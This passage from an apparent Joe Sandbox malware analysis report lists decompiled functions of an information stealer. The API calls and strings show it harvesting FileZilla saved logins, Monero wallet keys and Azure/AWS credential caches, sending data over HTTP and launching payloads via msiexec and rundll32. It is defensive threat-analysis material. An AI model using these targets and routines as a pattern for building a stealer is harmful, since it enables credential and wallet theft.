                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 4ea39e9887e85cd0ff66927cb1c2af07052400605c6de44a8b3c7aa7ec22a9e5
                              • Instruction ID: be254076a3904fb1bbbe7ddc9ff1592d5c1b98500f6e607b1b92c6916426f2ed
                              • Opcode Fuzzy Hash: 4ea39e9887e85cd0ff66927cb1c2af07052400605c6de44a8b3c7aa7ec22a9e5
                              • Instruction Fuzzy Hash: B6D14271D10108EBCB44EBF4DD5AEEE7378AF99300F508619F502A6091EF3CAA45DB62
                              Function 00795960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                                • Part of subcall function 007947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007959F8
                              • StrCmpCA.SHLWAPI(?,014CEA08), ref: 00795A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00795B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,014CEA38,00000000,?,014CA7F0,00000000,?,007B1A1C), ref: 00795E71
                              • lstrlen.KERNEL32(00000000), ref: 00795E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00795E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00795E9A
                              • lstrlen.KERNEL32(00000000), ref: 00795EAF
                              • lstrlen.KERNEL32(00000000), ref: 00795ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00795EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00795F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00795F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00795F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00795FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00795FBD
                              • HttpOpenRequestA.WININET(00000000,014CE958,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00795BF8
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • InternetCloseHandle.WININET(00000000), ref: 00795FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 2fe7a1d12457c7ae6bf10e838371e47803e2f7b1356ccf860b2e943dda5b81dc
                              • Instruction ID: 3a350efbdec3f232b3a5ba00299390bab4907376236089cf45a8ddd2143652ed
                              • Opcode Fuzzy Hash: 2fe7a1d12457c7ae6bf10e838371e47803e2f7b1356ccf860b2e943dda5b81dc
                              • Instruction Fuzzy Hash: 2D120D71920118FBDB55EBA0DC99FEEB378BF95700F5042A9B10662091EF783A49CF61
                              Function 0079CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0079D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0079D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D208
                              • lstrcat.KERNEL32(?,007B1478), ref: 0079D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D22A
                              • lstrcat.KERNEL32(?,007B147C), ref: 0079D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D24C
                              • lstrcat.KERNEL32(?,007B1480), ref: 0079D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D26E
                              • lstrcat.KERNEL32(?,007B1484), ref: 0079D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D290
                              • lstrcat.KERNEL32(?,007B1488), ref: 0079D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D2B2
                              • lstrcat.KERNEL32(?,007B148C), ref: 0079D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D2D4
                              • lstrcat.KERNEL32(?,007B1490), ref: 0079D2E3
                                • Part of subcall function 007AA820: lstrlen.KERNEL32(00794F05,?,?,00794F05,007B0DDE), ref: 007AA82B
                                • Part of subcall function 007AA820: lstrcpy.KERNEL32(007B0DDE,00000000), ref: 007AA885
                              • lstrlen.KERNEL32(?), ref: 0079D32A
                              • lstrlen.KERNEL32(?), ref: 0079D339
                                • Part of subcall function 007AAA70: StrCmpCA.SHLWAPI(014C8E80,0079A7A7,?,0079A7A7,014C8E80), ref: 007AAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0079D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 127822179fafde5fa1504f3cfba4c9f97ee91ac820e3be87ffd11a80032f8831
                              • Instruction ID: ae23c012761bd465ebf33bfd9ddfedf6d9e97a25b6486c4def011b593903c017
                              • Opcode Fuzzy Hash: 127822179fafde5fa1504f3cfba4c9f97ee91ac820e3be87ffd11a80032f8831
                              • Instruction Fuzzy Hash: 15E14B71950108EBCB44EBA0DD9AEEE7378BF95300F504269F107A6091DF3CAE59DB62
                              Function 0079C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,014CD408,00000000,?,007B144C,00000000,?,?), ref: 0079CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0079CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0079CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0079CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0079CAD9
                              • StrStrA.SHLWAPI(?,014CD498,007B0B52), ref: 0079CAF7
                              • StrStrA.SHLWAPI(00000000,014CD420), ref: 0079CB1E
                              • StrStrA.SHLWAPI(?,014CD860,00000000,?,007B1458,00000000,?,00000000,00000000,?,014C8F80,00000000,?,007B1454,00000000,?), ref: 0079CCA2
                              • StrStrA.SHLWAPI(00000000,014CD620), ref: 0079CCB9
                                • Part of subcall function 0079C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0079C871
                                • Part of subcall function 0079C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0079C87C
                              • StrStrA.SHLWAPI(?,014CD620,00000000,?,007B145C,00000000,?,00000000,014C9030), ref: 0079CD5A
                              • StrStrA.SHLWAPI(00000000,014C90A0), ref: 0079CD71
                                • Part of subcall function 0079C820: lstrcat.KERNEL32(?,007B0B46), ref: 0079C943
                                • Part of subcall function 0079C820: lstrcat.KERNEL32(?,007B0B47), ref: 0079C957
                                • Part of subcall function 0079C820: lstrcat.KERNEL32(?,007B0B4E), ref: 0079C978
                              • lstrlen.KERNEL32(00000000), ref: 0079CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0079CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 87e2060f3e003d6102a56d98fed659387b39c1a5321af1fe8437a866b18830fb
                              • Instruction ID: 68525decd3adc6add0c316ac107029cee88145c44300a4c075cbff89d39b3d8f
                              • Opcode Fuzzy Hash: 87e2060f3e003d6102a56d98fed659387b39c1a5321af1fe8437a866b18830fb
                              • Instruction Fuzzy Hash: 29E1FD71D10108FFDB55EBA0DC9AFEEB778AF55300F404269F10666191EF386A4ACB62
                              Function 007A8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • RegOpenKeyExA.ADVAPI32(00000000,014CB6E8,00000000,00020019,00000000,007B05B6), ref: 007A83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007A8426
                              • wsprintfA.USER32 ref: 007A8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007A847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A8499
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: bc8387be94bbbb303defb63d5c39ec4954c5b643289ccb74941452d92a93ca0c
                              • Instruction ID: 2c2633d52ae50329ca1b7da55fffb28a7492d78cfdb643a8a02a58035e04e01c
                              • Opcode Fuzzy Hash: bc8387be94bbbb303defb63d5c39ec4954c5b643289ccb74941452d92a93ca0c
                              • Instruction Fuzzy Hash: FA811DB1951118EBEB64DB50CC95FEAB7B8FF48700F008299E10AA6141DF796B85CF91
                              Function 007A4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 007A4DCD
                                • Part of subcall function 007A4910: wsprintfA.USER32 ref: 007A492C
                                • Part of subcall function 007A4910: FindFirstFileA.KERNEL32(?,?), ref: 007A4943
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 007A4E59
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B0FDC), ref: 007A4971
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B0FE0), ref: 007A4987
                                • Part of subcall function 007A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 007A4B7D
                                • Part of subcall function 007A4910: FindClose.KERNEL32(000000FF), ref: 007A4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007A4EE5
                                • Part of subcall function 007A4910: wsprintfA.USER32 ref: 007A49B0
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B08D2), ref: 007A49C5
                                • Part of subcall function 007A4910: wsprintfA.USER32 ref: 007A49E2
                                • Part of subcall function 007A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 007A4A1E
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,014CE9C8), ref: 007A4A4A
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,007B0FF8), ref: 007A4A5C
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,?), ref: 007A4A70
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,007B0FFC), ref: 007A4A82
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,?), ref: 007A4A96
                                • Part of subcall function 007A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 007A4AAC
                                • Part of subcall function 007A4910: DeleteFileA.KERNEL32(?), ref: 007A4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: c78c6872ff390e3e2402c8f35d5ca21965b12281183ff0277c24ae01d4353bc3
                              • Instruction ID: c31ff7daf3b632e74dd0c9077bf1e116037408c85e42977cf189c77d30df105d
                              • Opcode Fuzzy Hash: c78c6872ff390e3e2402c8f35d5ca21965b12281183ff0277c24ae01d4353bc3
                              • Instruction Fuzzy Hash: 5241B6B9A50208A7DB50F770EC5BFED3338AB65700F804594B545660C1EEB85BD8CB93
                              Function 007A9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007A906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 06e85eb33f6953bfcc855a283166a297381c32901f279f2f891184cdb2d6653c
                              • Instruction ID: e44970cbc436f0fbf676dbed86ff31f42f30b115f9cfe17230acff13568bf28d
                              • Opcode Fuzzy Hash: 06e85eb33f6953bfcc855a283166a297381c32901f279f2f891184cdb2d6653c
                              • Instruction Fuzzy Hash: E6710075950208EBDB04DFE4DD89FEEB7B8BF88300F108509F615A7290DB38A955DB61
                              Function 007A2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: c64ad97e35d7c33272a3173b0133a0e862e89202facc93e53c5584a1fa246863
                              • Instruction ID: a314a0913b3f2c695eb11d685b59684db7a7dcf92efd17faf0c7e5ea22dde3dd
                              • Opcode Fuzzy Hash: c64ad97e35d7c33272a3173b0133a0e862e89202facc93e53c5584a1fa246863
                              • Instruction Fuzzy Hash: 8012F171810108EADB45EBA0DC96FEEB778AF95300F504269F50766191EF3C6B4ACF92
                              Function 007A52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
